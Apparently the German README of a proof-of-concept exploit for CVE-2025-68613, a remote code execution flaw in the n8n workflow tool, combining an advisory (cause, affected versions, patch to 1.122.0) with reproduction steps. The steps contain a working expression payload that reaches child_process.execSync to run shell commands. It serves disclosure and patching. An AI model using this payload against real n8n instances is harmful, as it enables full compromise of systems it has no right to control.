
Proof-of-Concept-Exploit für CVE-2025-68613, eine kritische RCE in n8n Workflow-Automatisierung. Demonstriert die Ausführung beliebiger Befehle durch Umgehung des Expression Evaluator in Versionen vor 1.122.0.
Sicherheitshinweis: Kritische Sicherheitslücke zur Remote-Code-Ausführung in n8n (CVE-2025-68613)
Eine kritische Sicherheitslücke wurde im Workflow-Automatisierungstool n8n identifiziert, die die Ausführung beliebigen Codes ermöglicht. Authentifizierte Benutzer mit Berechtigungen zum Erstellen oder Bearbeiten von Workflows können diese Schwachstelle ausnutzen, um die Kontrolle über das System zu erlangen, auf dem die n8n-Instanz läuft. Zusammenfassung
CVE ID CVE-2025-68613 Sicherheitslücke Unzureichende Kontrolle dynamisch verwalteter Coderessourcen Schweregrad Kritisch Auswirkung Ausführung beliebiger Befehle, vollständige Systemkompromittierung Ursache Der Ausdrucks-Evaluator säubert den Zugriff auf das zugrunde liegende Node.js-Prozessobjekt (this.process) nicht, sodass ein Angreifer Systemmodule wie child_process anfordern und verwenden kann. Auswirkung
Ein Angreifer, der diese Sicherheitslücke erfolgreich ausnutzt, kann Folgendes erreichen:
Betroffene und gepatchte Versionen Status Version(en) Anfällig Alle Versionen vor 1.122.0 Gepatcht Version 1.122.0 und später Abhilfe
Es ist entscheidend, Ihre n8n-Instanz sofort auf Version 1.122.0 oder höher zu aktualisieren, um diese Sicherheitslücke zu beheben.
Exploit-Details für CVE-2025-68613
Dieses Verzeichnis enthält einen Proof-of-Concept für die Sicherheitslücke zur Remote-Code-Ausführung (RCE) in n8n (CVE-2025-68613). Voraussetzungen
Schritte zur Reproduktion
Workflow erstellen:
Knoten hinzufügen:
Set-Knoten konfigurieren:
Exploit-Payload einfügen:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
Ausführen und überprüfen:
